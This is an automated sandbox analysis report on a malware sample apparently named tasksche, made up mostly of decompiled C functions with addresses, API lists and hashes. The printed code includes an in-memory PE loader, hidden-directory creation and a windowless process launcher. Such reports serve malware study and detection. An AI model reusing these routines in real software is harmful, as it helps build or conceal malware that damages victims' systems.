							} else {
								_t125 = _t124 + _t126;
							}
							if(_t125 > _v8) {
								_v8 = _t125;
							}
							_t145 = _t145 + 0x28;
							_t146 = _t146 - 1;
						} while (_t146 != 0);
						goto L16;
					}
				}
				L2:
				SetLastError(0xc1);
				goto L3;
			}






























                    0x004021ef
                    0x004021f8
                    0x00402204
                    0x0040243d
                    0x00000000
                    0x0040243d
                    0x0040220a
                    0x00402212
                    0x00402239
                    0x00000000
                    0x00000000
                    0x00402242
                    0x0040224a
                    0x00000000
                    0x00402254
                    0x00402254
                    0x00402254
                    0x0040225a
                    0x00000000
                    0x00000000
                    0x0040225c
                    0x00402260
                    0x00402260
                    0x00402266
                    0x0040226a
                    0x0040228c
                    0x00402291
                    0x00402299
                    0x00000000
                    0x00000000
                    0x004022a7
                    0x004022aa
                    0x004022af
                    0x00000000
                    0x00000000
                    0x004022b9
                    0x004022bb
                    0x004022be
                    0x004022c1
                    0x004022c8
                    0x004022cb
                    0x004022d1
                    0x004022d7
                    0x00000000
                    0x00000000
                    0x004022e8
                    0x004022eb
                    0x004022ee
                    0x004022f0
                    0x004022f5
                    0x0040230f
                    0x0040231a
                    0x00402320
                    0x00402324
                    0x0040233d
                    0x00402340
                    0x0040234a
                    0x00402350
                    0x00402356
                    0x0040235c
                    0x00402362
                    0x00402368
                    0x0040236e
                    0x00402374
                    0x00402377
                    0x00402386
                    0x00402436
                    0x00402437
                    0x00000000
                    0x0040243c
                    0x00402396
                    0x0040239a
                    0x0040239d
                    0x004023a0
                    0x004023a7
                    0x004023ba
                    0x004023bc
                    0x004023bf
                    0x004023cc
                    0x00000000
                    0x00000000
                    0x004023d3
                    0x004023d3
                    0x004023d6
                    0x004023eb
                    0x004023ec
                    0x004023d8
                    0x004023e0
                    0x004023e6
                    0x004023e6
                    0x004023f8
                    0x00402414
                    0x00402419
                    0x0040244d
                    0x00402450
                    0x00000000
                    0x00402450
                    0x0040241e
                    0x00402448
                    0x00000000
                    0x00402448
                    0x00402420
                    0x00402421
                    0x00402424
                    0x00402429
                    0x00402441
                    0x00000000
                    0x00402441
                    0x00402430
                    0x00402430
                    0x00000000
                    0x004023f8
                    0x00402330
                    0x00402336
                    0x00402219
                    0x00402219
                    0x00000000
                    0x00402219
                    0x00402306
                    0x00402308
                    0x0040230d
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0040230d
                    0x0040226c
                    0x0040226f
                    0x0040226f
                    0x00402272
                    0x00402276
                    0x0040227c
                    0x00402278
                    0x00402278
                    0x00402278
                    0x00402281
                    0x00402283
                    0x00402283
                    0x00402286
                    0x00402289
                    0x00402289
                    0x00000000
                    0x0040226f
                    0x0040224a
                    0x00402214
                    0x00402219
                    0x00000000

                    APIs
                      • Part of subcall function 00402457: SetLastError.KERNEL32(0000000D,00402200,?!@,00000040,?,0000DDB6,?,00402185,0040216E,00402185,00402198,004021A3,004021B2,00000000,0040213F,00000000), ref: 00402463
                    • SetLastError.KERNEL32(000000C1,?,0000DDB6,?,00402185,0040216E,00402185,00402198,004021A3,004021B2,00000000,0040213F,00000000), ref: 00402219
                    • GetModuleHandleA.KERNEL32(kernel32.dll,?,0000DDB6,?,00402185,0040216E,00402185,00402198,004021A3,004021B2,00000000,0040213F,00000000), ref: 00402291
                    • GetProcessHeap.KERNEL32(00000008,0000003C,?,?,?,?,?,?,?,?,?,?,00402185,00402198,004021A3,004021B2), ref: 00402313
                    • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00402185,00402198,004021A3,004021B2,00000000), ref: 0040231A
                    • memcpy.MSVCRT(00000000,?,8328EC83,?,?,?,?,?,?,?,?,?,?,00402185,00402198,004021A3), ref: 004023A7
                      • Part of subcall function 00402470: memset.MSVCRT(?,00000000,?), ref: 004024D5
                    • SetLastError.KERNEL32(0000045A), ref: 00402430
                    Strings
                    Memory Dump Source
                    • Source File: 00000013.00000002.468432098.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000013.00000002.468334608.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000013.00000002.468466584.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000013.00000002.468486627.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000013.00000002.468514366.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_19_2_400000_tasksche.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLast$Heap$AllocHandleModuleProcessmemcpymemset
                    • String ID: ?!@$GetNativeSystemInfo$kernel32.dll
                    • API String ID: 1900561814-3657104962
                    • Opcode ID: 0e24c0e50799aa35dd9f5fcc36a4565fcb8133d83dc7aa1daf15d2422d00f892
                    • Instruction ID: 3b750285519b5b92c664dbe57bf04ddc7e4262fbacbc213f0015b22f99412f1c
                    • Opcode Fuzzy Hash: 0e24c0e50799aa35dd9f5fcc36a4565fcb8133d83dc7aa1daf15d2422d00f892
                    • Instruction Fuzzy Hash: 0A81AD71A01602AFDB209FA5CE49AAB77E4BF08314F10443EF945E76D1D7B8E851CB98
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00401AF6 Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 45COMMON
                    Download Yara Rule
                    C-Code - Quality: 91%
                    			E00401AF6(WCHAR* _a4, WCHAR* _a8, wchar_t* _a12) {
				void* _t15;
				WCHAR* _t17;

				CreateDirectoryW(_a4, 0);
				if(SetCurrentDirectoryW(_a4) == 0) {
					L2:
					return 0;
				}
				_t17 = _a8;
				CreateDirectoryW(_t17, 0);
				if(SetCurrentDirectoryW(_t17) != 0) {
					SetFileAttributesW(_t17, GetFileAttributesW(_t17) | 0x00000006);
					if(_a12 != 0) {
						_push(_t17);
						swprintf(_a12, L"%s\\%s", _a4);
					}
					_t15 = 1;
					return _t15;
				}
				goto L2;
			}





                    0x00401b07
                    0x00401b16
                    0x00401b27
                    0x00000000
                    0x00401b27
                    0x00401b18
                    0x00401b1e
                    0x00401b25
                    0x00401b36
                    0x00401b40
                    0x00401b42
                    0x00401b4e
                    0x00401b54
                    0x00401b59
                    0x00000000
                    0x00401b59
                    0x00000000

                    APIs
                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 00401B07
                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00401B12
                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 00401B1E
                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00401B21
                    • GetFileAttributesW.KERNEL32(?), ref: 00401B2C
                    • SetFileAttributesW.KERNEL32(?,00000000), ref: 00401B36
                    • swprintf.MSVCRT(?,%s\%s,?,?), ref: 00401B4E
                    Strings
                    Memory Dump Source
                    • Source File: 00000013.00000002.468432098.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000013.00000002.468334608.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000013.00000002.468466584.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000013.00000002.468486627.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000013.00000002.468514366.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_19_2_400000_tasksche.jbxd
                    Yara matches
                    Similarity
                    • API ID: Directory$AttributesCreateCurrentFile$swprintf
                    • String ID: %s\%s
                    • API String ID: 1036847564-4073750446
                    • Opcode ID: e8d223ccc4edc92c4536f1ca202ba6161fd040db7272db682552e70b0b18d917
                    • Instruction ID: 4a0a9b6f0974b2b783bf1fd4f993800d593798a72c4fd06372b86497b3864b36
                    • Opcode Fuzzy Hash: e8d223ccc4edc92c4536f1ca202ba6161fd040db7272db682552e70b0b18d917
                    • Instruction Fuzzy Hash: 99F06271200208BBEB103F65DE44F9B3B2CEB457A5F015832FA46B61A1DB75A855CAB8
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00401064 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 63processsynchronizationCOMMON
                    Download Yara Rule
                    C-Code - Quality: 81%
                    			E00401064(CHAR* _a4, long _a8, DWORD* _a12) {
				struct _PROCESS_INFORMATION _v20;
				struct _STARTUPINFOA _v88;
				signed int _t32;
				intOrPtr _t37;

				_t32 = 0x10;
				_v88.cb = 0x44;
				memset( &(_v88.lpReserved), 0, _t32 << 2);
				_v20.hProcess = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t37 = 1;
				_v88.wShowWindow = 0;
				_v88.dwFlags = _t37;
				if(CreateProcessA(0, _a4, 0, 0, 0, 0x8000000, 0, 0,  &_v88,  &_v20) == 0) {
					return 0;
				}
				if(_a8 != 0) {
					if(WaitForSingleObject(_v20.hProcess, _a8) != 0) {
						TerminateProcess(_v20.hProcess, 0xffffffff);
					}
					if(_a12 != 0) {
						GetExitCodeProcess(_v20.hProcess, _a12);
					}
				}
				CloseHandle(_v20);
				CloseHandle(_v20.hThread);
				return _t37;
			}







                    0x00401070
                    0x00401074
                    0x0040107d
                    0x00401082
                    0x00401085
                    0x00401086
                    0x00401087
                    0x0040108d
                    0x0040108e
                    0x004010a1
                    0x004010b0
                    0x00000000
                    0x004010f7
                    0x004010b5
                    0x004010c5
                    0x004010cc
                    0x004010cc
                    0x004010d5
                    0x004010dd
                    0x004010dd
                    0x004010d5
                    0x004010ec
                    0x004010f1
                    0x00000000

                    APIs
                    • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,00000044,?), ref: 004010A8
                    • WaitForSingleObject.KERNEL32(?,?), ref: 004010BD
                    • TerminateProcess.KERNEL32(?,000000FF), ref: 004010CC
                    • GetExitCodeProcess.KERNEL32(?,?), ref: 004010DD
                    • CloseHandle.KERNEL32(?), ref: 004010EC
                    • CloseHandle.KERNEL32(?), ref: 004010F1
                    Strings
                    Memory Dump Source
                    • Source File: 00000013.00000002.468432098.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000013.00000002.468334608.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000013.00000002.468466584.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000013.00000002.468486627.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000013.00000002.468514366.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_19_2_400000_tasksche.jbxd
                    Yara matches
                    Similarity
                    • API ID: Process$CloseHandle$CodeCreateExitObjectSingleTerminateWait
                    • String ID: D
                    • API String ID: 786732093-2746444292
                    • Opcode ID: 520ef4afec62fe4405832db260c3c6b21caa087d375fb1c1d919acb3a27097cb
                    • Instruction ID: fabf2a0aaa91e867d54492d1ca24e81fc8ed090543e33b3e61fa812da4358066
                    • Opcode Fuzzy Hash: 520ef4afec62fe4405832db260c3c6b21caa087d375fb1c1d919acb3a27097cb
                    • Instruction Fuzzy Hash: 8D116431900229ABDB218F9ADD04ADFBF79FF04720F008426F514B65A0DB708A18DAA8
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 004077BA Relevance: 12.1, APIs: 8, Instructions: 77COMMON
                    Download Yara Rule
                    C-Code - Quality: 81%
                    			_entry_(void* __ebx, void* __edi, void* __esi) {
				CHAR* _v8;
				intOrPtr* _v24;
				intOrPtr _v28;
				struct _STARTUPINFOA _v96;
				int _v100;
				char** _v104;
				int _v108;
				void _v112;
				char** _v116;
				intOrPtr* _v120;
				intOrPtr _v124;
				intOrPtr* _t23;
				intOrPtr* _t24;
				void* _t27;
				void _t29;
				intOrPtr _t36;
				signed int _t38;
				int _t40;
				intOrPtr* _t41;
				intOrPtr _t42;
				intOrPtr _t46;
				intOrPtr _t47;
				intOrPtr _t49;
				intOrPtr* _t55;
				intOrPtr _t58;
				intOrPtr _t61;

				_push(0xffffffff);
				_push(0x40d488);
				_push(0x4076f4);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t58;
				_v28 = _t58 - 0x68;
				_v8 = 0;
				__set_app_type(2);
				 *0x40f94c =  *0x40f94c | 0xffffffff;
				 *0x40f950 =  *0x40f950 | 0xffffffff;
				_t23 = __p__fmode();
				_t46 =  *0x40f948; // 0x0
				 *_t23 = _t46;
				_t24 = __p__commode();
				_t47 =  *0x40f944; // 0x0
				 *_t24 = _t47;
				 *0x40f954 = _adjust_fdiv;
				_t27 = E0040793F( *_adjust_fdiv);
				_t61 =  *0x40f870; // 0x1
				if(_t61 == 0) {
					__setusermatherr(E0040793C);
				}
				E0040792A(_t27);
				_push(0x40e00c);
				_push(0x40e008);
				L00407924();
				_t29 =  *0x40f940; // 0x0
				_v112 = _t29;
				__getmainargs( &_v100,  &_v116,  &_v104,  *0x40f93c,  &_v112);
				_push(0x40e004);
				_push(0x40e000);
				L00407924();
				_t55 =  *_acmdln;
				_v120 = _t55;
				if( *_t55 != 0x22) {
					while(1) {
						__eflags =  *_t55 - 0x20;
						if(__eflags <= 0) {
							goto L7;
						}
						_t55 = _t55 + 1;
						_v120 = _t55;
					}
				} else {
					do {
						_t55 = _t55 + 1;
						_v120 = _t55;
						_t42 =  *_t55;
					} while (_t42 != 0 && _t42 != 0x22);
					if( *_t55 == 0x22) {
						L6:
						_t55 = _t55 + 1;
						_v120 = _t55;
					}
				}
				L7:
				_t36 =  *_t55;
				if(_t36 != 0 && _t36 <= 0x20) {
					goto L6;
				}
				_v96.dwFlags = 0;
				GetStartupInfoA( &_v96);
				_t69 = _v96.dwFlags & 0x00000001;
				if((_v96.dwFlags & 0x00000001) == 0) {
					_t38 = 0xa;
				} else {
					_t38 = _v96.wShowWindow & 0x0000ffff;
				}
				_t40 = L00401FE7(_t69, GetModuleHandleA(0), 0, _t55, _t38);
				_v108 = _t40;
				exit(_t40);
				_t41 = _v24;
				_t49 =  *((intOrPtr*)( *_t41));
				_v124 = _t49;
				_push(_t41);
				_push(_t49);
				L0040791E();
				return _t41;
			}





























                    0x004077bd
                    0x004077bf
                    0x004077c4
                    0x004077cf
                    0x004077d0
                    0x004077dd
                    0x004077e2
                    0x004077e7
                    0x004077ee
                    0x004077f5
                    0x004077fc
                    0x00407802
                    0x00407808
                    0x0040780a
                    0x00407810
                    0x00407816
                    0x0040781f
                    0x00407824
                    0x00407829
                    0x0040782f
                    0x00407836
                    0x0040783c
                    0x0040783d
                    0x00407842
                    0x00407847
                    0x0040784c
                    0x00407851
                    0x00407856
                    0x0040786f
                    0x00407875
                    0x0040787a
                    0x0040787f
                    0x0040788c
                    0x0040788e
                    0x00407894
                    0x004078d0
                    0x004078d0
                    0x004078d3
                    0x00000000
                    0x00000000
                    0x004078d5
                    0x004078d6
                    0x004078d6
                    0x00407896
                    0x00407896
                    0x00407896
                    0x00407897
                    0x0040789a
                    0x0040789c
                    0x004078a7
                    0x004078a9
                    0x004078a9
                    0x004078aa
                    0x004078aa
                    0x004078a7
                    0x004078ad
                    0x004078ad
                    0x004078b1
                    0x00000000
                    0x00000000
                    0x004078b7
                    0x004078be
                    0x004078c4
                    0x004078c8
                    0x004078dd
                    0x004078ca
                    0x004078ca
                    0x004078ca
                    0x004078e9
                    0x004078ee
                    0x004078f2
                    0x004078f8
                    0x004078fd
                    0x004078ff
                    0x00407902
                    0x00407903
                    0x00407904
                    0x0040790b

                    APIs
                    • __set_app_type.MSVCRT(00000002), ref: 004077E7
                    • __p__fmode.MSVCRT ref: 004077FC
                    • __p__commode.MSVCRT ref: 0040780A
                    • _initterm.MSVCRT(0040E008,0040E00C), ref: 0040784C
                    • __getmainargs.MSVCRT(?,?,?,?,0040E008,0040E00C), ref: 0040786F
                    • _initterm.MSVCRT(0040E000,0040E004), ref: 0040787F
                    Memory Dump Source
                    • Source File: 00000013.00000002.468432098.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000013.00000002.468334608.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000013.00000002.468466584.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000013.00000002.468486627.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000013.00000002.468514366.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_19_2_400000_tasksche.jbxd
                    Yara matches
                    Similarity
                    • API ID: _initterm$__getmainargs__p__commode__p__fmode__set_app_type
                    • String ID:
                    • API String ID: 3626615345-0
                    • Opcode ID: bfbd7971593811c7fff28e35bb39fa0d644f96314b868f8e424e213b276a966c
                    • Instruction ID: 63d29f1c4e41429a3497612c8de1f509d91e94429ea3a2aefb8dc74a018e4fb3
                    • Opcode Fuzzy Hash: bfbd7971593811c7fff28e35bb39fa0d644f96314b868f8e424e213b276a966c
                    • Instruction Fuzzy Hash: 51318BB1D04344AFDB20AFA5DE49F5A7BA8BB05710F10463EF541B72E0CB786805CB59
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00407831 Relevance: 12.1, APIs: 8, Instructions: 72COMMON
                    Download Yara Rule
                    C-Code - Quality: 84%
                    			E00407831(CHAR* __ebx) {
				void* _t19;
				void _t21;
				intOrPtr _t28;
				signed int _t30;
				int _t32;
				intOrPtr* _t33;
				intOrPtr _t34;
				CHAR* _t35;
				intOrPtr _t38;
				intOrPtr* _t41;
				void* _t42;

				_t35 = __ebx;
				__setusermatherr(E0040793C);
				E0040792A(_t19);
				_push(0x40e00c);
				_push(0x40e008);
				L00407924();
				_t21 =  *0x40f940; // 0x0
				 *(_t42 - 0x6c) = _t21;
				__getmainargs(_t42 - 0x60, _t42 - 0x70, _t42 - 0x64,  *0x40f93c, _t42 - 0x6c);
				_push(0x40e004);
				_push(0x40e000);
				L00407924();
				_t41 =  *_acmdln;
				 *((intOrPtr*)(_t42 - 0x74)) = _t41;
				if( *_t41 != 0x22) {
					while(1) {
						__eflags =  *_t41 - 0x20;
						if(__eflags <= 0) {
							goto L6;
						}
						_t41 = _t41 + 1;
						 *((intOrPtr*)(_t42 - 0x74)) = _t41;
					}
				} else {
					do {
						_t41 = _t41 + 1;
						 *((intOrPtr*)(_t42 - 0x74)) = _t41;
						_t34 =  *_t41;
					} while (_t34 != _t35 && _t34 != 0x22);
					if( *_t41 == 0x22) {
						L5:
						_t41 = _t41 + 1;
						 *((intOrPtr*)(_t42 - 0x74)) = _t41;
					}
				}
				L6:
				_t28 =  *_t41;
				if(_t28 != _t35 && _t28 <= 0x20) {
					goto L5;
				}
				 *(_t42 - 0x30) = _t35;
				GetStartupInfoA(_t42 - 0x5c);
				_t52 =  *(_t42 - 0x30) & 0x00000001;
				if(( *(_t42 - 0x30) & 0x00000001) == 0) {
					_t30 = 0xa;
				} else {
					_t30 =  *(_t42 - 0x2c) & 0x0000ffff;
				}
				_t32 = L00401FE7(_t52, GetModuleHandleA(_t35), _t35, _t41, _t30);
				 *(_t42 - 0x68) = _t32;
				exit(_t32);
				_t33 =  *((intOrPtr*)(_t42 - 0x14));
				_t38 =  *((intOrPtr*)( *_t33));
				 *((intOrPtr*)(_t42 - 0x78)) = _t38;
				_push(_t33);
				_push(_t38);
				L0040791E();
				return _t33;
			}














                    0x00407831
                    0x00407836
                    0x0040783d
                    0x00407842
                    0x00407847
                    0x0040784c
                    0x00407851
                    0x00407856
                    0x0040786f
                    0x00407875
                    0x0040787a
                    0x0040787f
                    0x0040788c
                    0x0040788e
                    0x00407894
                    0x004078d0
                    0x004078d0
                    0x004078d3
                    0x00000000
                    0x00000000
                    0x004078d5
                    0x004078d6
                    0x004078d6
                    0x00407896
                    0x00407896
                    0x00407896
                    0x00407897
                    0x0040789a
                    0x0040789c
                    0x004078a7
                    0x004078a9
                    0x004078a9
                    0x004078aa
                    0x004078aa
                    0x004078a7
                    0x004078ad
                    0x004078ad
                    0x004078b1
                    0x00000000
                    0x00000000
                    0x004078b7
                    0x004078be
                    0x004078c4
                    0x004078c8
                    0x004078dd
                    0x004078ca
                    0x004078ca
                    0x004078ca
                    0x004078e9
                    0x004078ee
                    0x004078f2
                    0x004078f8
                    0x004078fd
                    0x004078ff
                    0x00407902
                    0x00407903
                    0x00407904
                    0x0040790b

                    APIs
                    • __setusermatherr.MSVCRT(0040793C), ref: 00407836
                      • Part of subcall function 0040792A: _controlfp.MSVCRT(00010000,00030000,00407842), ref: 00407934
                    • _initterm.MSVCRT(0040E008,0040E00C), ref: 0040784C
                    • __getmainargs.MSVCRT(?,?,?,?,0040E008,0040E00C), ref: 0040786F
                    • _initterm.MSVCRT(0040E000,0040E004), ref: 0040787F
                    • GetStartupInfoA.KERNEL32(?), ref: 004078BE
                    • GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 004078E2
                    • exit.MSVCRT(00000000,00000000,?,?,?,?), ref: 004078F2
                    • _XcptFilter.MSVCRT(?,?,?,?,?,?), ref: 00407904
                    Memory Dump Source
                    • Source File: 00000013.00000002.468432098.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000013.00000002.468334608.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000013.00000002.468466584.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000013.00000002.468486627.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000013.00000002.468514366.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_19_2_400000_tasksche.jbxd
                    Yara matches
                    Similarity
                    • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__setusermatherr_controlfpexit
                    • String ID:
                    • API String ID: 2141228402-0
                    • Opcode ID: e2abdc3946810ebb19c889ba728617f0f692a6676515e3c370649a79fa0f1872
                    • Instruction ID: 738ed170af38765147f9c33b7b7214e7a7d60aeb9597ff7827fffae83538cc25
                    • Opcode Fuzzy Hash: e2abdc3946810ebb19c889ba728617f0f692a6676515e3c370649a79fa0f1872
                    • Instruction Fuzzy Hash: F52135B2C04258AEEB20AFA5DD48AAD7BB8AF05304F24443FF581B7291D7786841CB59
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 004027DF Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 121COMMON
                    Download Yara Rule
                    C-Code - Quality: 96%
                    			E004027DF(signed int* _a4) {
				intOrPtr _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr* _t50;
				intOrPtr _t53;
				intOrPtr _t55;
				void* _t58;
				void _t60;
				signed int _t63;
				signed int _t67;
				intOrPtr _t68;
				void* _t73;
				signed int _t75;
				intOrPtr _t87;
				intOrPtr* _t88;
				intOrPtr* _t90;
				void* _t91;

				_t90 = _a4;
				_t2 = _t90 + 4; // 0x4be8563c
				_t87 =  *_t2;
				_t50 =  *_t90 + 0x80;
				_t75 = 1;
				_v16 = _t87;
				_v12 = _t75;
				if( *((intOrPtr*)(_t50 + 4)) != 0) {
					_t73 =  *_t50 + _t87;
					if(IsBadReadPtr(_t73, 0x14) != 0) {
						L25:
						return _v12;
					}
					while(1) {
						_t53 =  *((intOrPtr*)(_t73 + 0xc));
						if(_t53 == 0) {
							goto L25;
						}
						_t8 = _t90 + 0x30; // 0xc085d0ff
						_t55 =  *((intOrPtr*)(_t90 + 0x24))(_t53 + _t87,  *_t8);
						_v8 = _t55;
						if(_t55 == 0) {
							SetLastError(0x7e);
							L23:
							_v12 = _v12 & 0x00000000;
							goto L25;
						}
						_t11 = _t90 + 0xc; // 0x317459c0
						_t14 = _t90 + 8; // 0x85000001
						_t58 = realloc( *_t14, 4 +  *_t11 * 4);
						if(_t58 == 0) {
							_t40 = _t90 + 0x30; // 0xc085d0ff
							 *((intOrPtr*)(_t90 + 0x2c))(_v8,  *_t40);
							SetLastError(0xe);
							goto L23;
						}
						_t15 = _t90 + 0xc; // 0x317459c0
						 *(_t90 + 8) = _t58;
						 *((intOrPtr*)(_t58 +  *_t15 * 4)) = _v8;
						 *(_t90 + 0xc) =  *(_t90 + 0xc) + 1;
						_t60 =  *_t73;
						if(_t60 == 0) {
							_t88 = _t87 +  *((intOrPtr*)(_t73 + 0x10));
							_a4 = _t88;
						} else {
							_t88 =  *((intOrPtr*)(_t73 + 0x10)) + _v16;
							_a4 = _t60 + _t87;
						}
						while(1) {
							_t63 =  *_a4;
							if(_t63 == 0) {
								break;
							}
							if((_t63 & 0x80000000) == 0) {
								_t32 = _t90 + 0x30; // 0xc085d0ff
								_push( *_t32);
								_t67 = _t63 + _v16 + 2;
							} else {
								_t30 = _t90 + 0x30; // 0xc085d0ff
								_push( *_t30);
								_t67 = _t63 & 0x0000ffff;
							}
							_t68 =  *((intOrPtr*)(_t90 + 0x28))(_v8, _t67);
							_t91 = _t91 + 0xc;
							 *_t88 = _t68;
							if(_t68 == 0) {
								_v12 = _v12 & 0x00000000;
								break;
							} else {
								_a4 =  &(_a4[1]);
								_t88 = _t88 + 4;
								continue;
							}
						}
						if(_v12 == 0) {
							_t45 = _t90 + 0x30; // 0xc085d0ff
							 *((intOrPtr*)(_t90 + 0x2c))(_v8,  *_t45);
							SetLastError(0x7f);
							goto L25;
						}
						_t73 = _t73 + 0x14;
						if(IsBadReadPtr(_t73, 0x14) == 0) {
							_t87 = _v16;
							continue;
						}
						goto L25;
					}
					goto L25;
				}
				return _t75;
			}




















                    0x004027e6
                    0x004027ee
                    0x004027ee
                    0x004027f1
                    0x004027f6
                    0x004027f7
                    0x004027fa
                    0x00402801
                    0x0040280d
                    0x0040281a
                    0x0040291c
                    0x00000000
                    0x0040291f
                    0x00402825
                    0x00402825
                    0x0040282a
                    0x00000000
                    0x00000000
                    0x00402830
                    0x00402836
                    0x0040283a
                    0x00402840
                    0x004028fd
                    0x004028fd
                    0x00402903
                    0x00000000
                    0x00402903
                    0x00402846
                    0x00402851
                    0x00402854
                    0x0040285e
                    0x004028f0
                    0x004028f6
                    0x004028fd
                    0x00000000
                    0x004028fd
                    0x00402864
                    0x0040286a
                    0x0040286d
                    0x00402870
                    0x00402873
                    0x00402877
                    0x00402889
                    0x0040288b
                    0x00402879
                    0x0040287e
                    0x00402881
                    0x00402881
                    0x0040288e
                    0x00402891
                    0x00402895
                    0x00000000
                    0x00000000
                    0x0040289c
                    0x004028ab
                    0x004028ab
                    0x004028b0
                    0x0040289e
                    0x0040289e
                    0x0040289e
                    0x004028a1
                    0x004028a1
                    0x004028b7
                    0x004028ba
                    0x004028bd
                    0x004028c1
                    0x004028cc
                    0x00000000
                    0x004028c3
                    0x004028c3
                    0x004028c7
                    0x00000000
                    0x004028c7
                    0x004028c1
                    0x004028d4
                    0x00402909
                    0x0040290f
                    0x00402916
                    0x00000000
                    0x00402916
                    0x004028d6
                    0x004028e4
                    0x00402822
                    0x00000000
                    0x00402822
                    0x00000000
                    0x004028ea
                    0x00000000
                    0x00402825
                    0x00000000

                    APIs
                    • IsBadReadPtr.KERNEL32(00000000,00000014,00000000,00000001,00000000,?!@,004023F5,00000000), ref: 00402812
                    • realloc.MSVCRT(85000001,317459C0), ref: 00402854
                    • IsBadReadPtr.KERNEL32(-00000014,00000014), ref: 004028DC
                    Strings
                    Memory Dump Source
                    • Source File: 00000013.00000002.468432098.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000013.00000002.468334608.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000013.00000002.468466584.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000013.00000002.468486627.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000013.00000002.468514366.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_19_2_400000_tasksche.jbxd
                    Yara matches
                    Similarity
                    • API ID: Read$realloc
                    • String ID: ?!@
                    • API String ID: 1241503663-708128716
                    • Opcode ID: 3ef8fdaf83090ca6dd9f312f51019f46009b35537f3f51f7116a8d4e5983476b
                    • Instruction ID: b911edbb3638e6438919fa35cb7379f64586f657f287b8edbc273cd359ebb62a
                    • Opcode Fuzzy Hash: 3ef8fdaf83090ca6dd9f312f51019f46009b35537f3f51f7116a8d4e5983476b
                    • Instruction Fuzzy Hash: 4841AE76A00205EFDB109F55CE49B5ABBF4FF44310F24803AE846B62D1D7B8E900DB59
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00401225 Relevance: 10.6, APIs: 7, Instructions: 87COMMON
                    Download Yara Rule
                    C-Code - Quality: 86%
                    			E00401225(intOrPtr _a4) {
				signed int _v8;
				long _v12;
				void _v410;
				long _v412;
				long _t34;
				signed int _t42;
				intOrPtr _t44;
				signed int _t45;
				signed int _t48;
				int _t54;
				signed int _t56;
				signed int _t60;
				signed int _t61;
				signed int _t62;
				void* _t71;
				signed short* _t72;
				void* _t76;
				void* _t77;

				_t34 =  *0x40f874; // 0x0
				_v412 = _t34;
				_t56 = 0x63;
				_v12 = 0x18f;
				memset( &_v410, 0, _t56 << 2);
				asm("stosw");
				GetComputerNameW( &_v412,  &_v12);
				_v8 = _v8 & 0x00000000;
				_t54 = 1;
				if(wcslen( &_v412) > 0) {
					_t72 =  &_v412;
					do {
						_t54 = _t54 * ( *_t72 & 0x0000ffff);
						_v8 = _v8 + 1;
						_t72 =  &(_t72[1]);
